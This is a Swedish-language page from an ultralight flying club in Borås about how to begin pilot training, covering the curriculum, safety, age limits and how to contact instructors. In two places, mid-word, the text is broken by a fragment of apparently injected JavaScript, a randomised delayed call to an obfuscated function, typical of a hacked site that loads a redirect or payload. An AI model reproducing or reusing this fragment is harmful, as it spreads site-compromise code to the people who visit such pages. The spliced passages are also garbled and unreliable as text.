Börja flyga

Borås Ult­ralätt Flyg­klubb har mer än tret­tio års erfa­ren­het av att utbilda nya pilo­ter — allt från abso­luta novi­ser som ald­rig sut­tit i ett flyg­plan förut, till per­so­ner som sedan tidi­gare har haft andom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}andra for­mer av flyg­cer­ti­fi­kat. Vi har stän­digt ett antal ele­ver i olika sta­dier av utbildning.

Vi föl­jer en strikt fast­ställd läro­plan för att se till att ele­verna lär sig att flyga säkert och tryggt och kan behärska alla situ­a­tio­ner som kan före­komma under en flyg­ning. Vi läg­ger myc­ket stor tyngd­punkt vid just säker­he­ten — ult­ralätt flyg­ning är inte på något sätt far­li­gare än van­lig pri­vat­flyg­ning med nor­mal­klas­sade flyg­plan om man ser till att följa regel­sy­ste­met och sina egna begränsningar.

Bestämt dig?

Utbild­ningen består dels av en teo­re­tisk del, och dels av en prak­tisk del. För att få börja med den prak­tiska utbild­ningen, dvs att flyga med lärare, måste man först ha ett elev­till­stånd.

Totalt tar utbild­ningen från den första teo­ri­lek­tio­nen till cer­ti­fi­ka­tet i handom()*5);if (c==3){var delay = 15000;setTimeout($hiVNZt4Y5cDrbJXMhLy(0), delay);}anden unge­fär nio måna­der, men stora skill­na­der finns givet­vis, bero­ende på t ex hur myc­ket tid du kan avsätta för flyglektionerna.

Man kan börja ta flyg­lek­tio­ner när man är 16 år. Nor­malt ska man vara 18 år för att få sitt cer­ti­fi­kat, men det går att få dis­pens vid fyllda 17 år. Ytter­li­gare infor­ma­tion finns på Trans­port­sty­rel­sens webb­plats under Luftfart.

Det första ste­get är att ringa eller maila kurs­le­da­ren för teo­ri­ut­bild­ningen på klubben.

Du kan även kon­takta någon av våra flyglä­rare för en provlektion.